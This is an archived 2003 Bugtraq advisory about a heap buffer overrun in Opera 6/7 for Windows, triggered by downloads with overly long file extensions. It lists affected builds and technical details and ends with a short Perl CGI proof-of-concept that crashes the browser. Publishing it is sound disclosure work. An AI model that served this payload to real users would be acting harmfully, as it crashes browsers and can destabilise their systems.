lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030428030813.8DF3.NESUMIN@softhome.net>
Date: Mon, 28 Apr 2003 03:09:01 +0900
From: nesumin <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability in Download.


Greetings.
We, :: Operash :: here release the information about vulnerability of Opera.

              _________________________________________________

---------------------------------------------------------------------------------
SUMMARY        : [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability
                 in Download.
PRODUCT        : Opera for Windows
VERSIONS       : 7.10 build 2840
                 7.03 build 2670
                 7.02 build 2668
                 7.02 bork build 2656b
                 7.01 build 2651
                 6.06b build 1145
                 6.06 build 1144
                 6.05 build 1140
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 DoS such as Crash, Abnormal Termination, Opera Unexecutable,
                 System Unstable/Freeze.
DISCOVERED BY  : :: Operash :: (imagine, nesumin)
REPORTED DATE  : 2003-04-25
PUBLISHED DATE : 2003-04-28
----------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI base Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  A buffer overrun occurs by the unchecked buffer on the heap and it taints the data on heap.
  That's because Opera6/7 for Windows don't check the length of filename.

  Opera users, therefore, would face the DoS Attack such as the abnormal termination, OS crash,
  be unexecutable, etc when he is in the part of long extension name file downloading.


2. SYSTEMS AFFECTED
=====================

  Opera (For Windows)
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651
    Opera 6.06b build 1145
    Opera 6.06 build 1144
    Opera 6.05 build 1140

  Other versions could have this vulnerability.


3. SYSTEMS NOT AFFECTED
=========================

  ----


4. EXAMINES
=============

  Opera (For Windows, English/Japanese) :
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651
    Opera 6.06b build 1145
    Opera 6.06 build 1144
    Opera 6.05 build 1140

  Platform :
    Windows 98SE Japanese
    Windows 2000 PRO SP3 Japanese


5. TO VENDOR
==============

  Reported (2003/04/25).


6. DETAILS
=============

  Opera writes 16-bit wide character encoded cache file name which is made of
  like file extensions into the buffer of heap area which is about 512 bytes.

  While this process, Opera doesn't check the length of extension
  and writes data ahead of buffer's bound.
  That causes a destruction of pointer and data of memory managers on the heap,
  which could be overwritten by arbitrary data.(sequential like "XX00XX00")

  Opera would overdrive and get some abnormal termination.
  Moreover, when you restart Opera with a corrupted cache-index due to
  the cache configuration, there again occurs buffer overrun on the heap
  and Opera would be unexecutable.
  This could be avoided by rectifying or deleting the cache-index "dcache4.url".

  However, even at randomly destructed heap area could make Windows 9x systems
  unstable and down.
  About the risk of arbitrary code execution, we estimate that it's slightly
  difficult to process the buffer with arbitrary codes.

  Because(nn below means hexadecimal from 0x00 to 0xFF);

  a. Can overwrite merely with sequential record like "nn00nn00nn00nn00".
     DWORD value must be allocated only by "0x00nn00nn".

  b. It's not easy to overwrite the pointers and data or to forecast the address
     because the layout on the heap is variable due to the system configurations,
     Opera's chache or memory relevant configuration.

  Algate, its potential risk is so high.
  This could be more serious security hole if a further exploit would be found.


7. SAMPLE CODE
================

  This is a Perl script.

  ---------------------------------------------------------------
  #!/usr/bin/perl
  # Smash Heap Memory.
  # This script is CGI program.

  $|=1;
  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";
  print qq~Content-Disposition: filename="$filename"\r\n~;
  print "\r\n";
  print "<html><body>Love & Peace :)</body></html>\r\n";
  ---------------------------------------------------------------


8. DISCLAIMER
===============

  a. We cannot guarantee the accuracy of all statements in this information.
  b. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  c. And we will take no responsibility for any kinds of disadvantages by
     using this information.
  d. Copyright is held by :: Operash :: and relatives.


9. CONTACT, ETC
=================

  :: Operash ::
  [ Unofficial Opera's Bug and Security information site for Japanese people ]

  imagine (Operash Webmaster)
  nesumin <nesumin@...thome.net> if you have any question, please contact nesumin.


  Thanks to :

    melorin
    piso(sexy)


               _________________________________________________


-------
nesumin <nesumin@...thome.net>




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ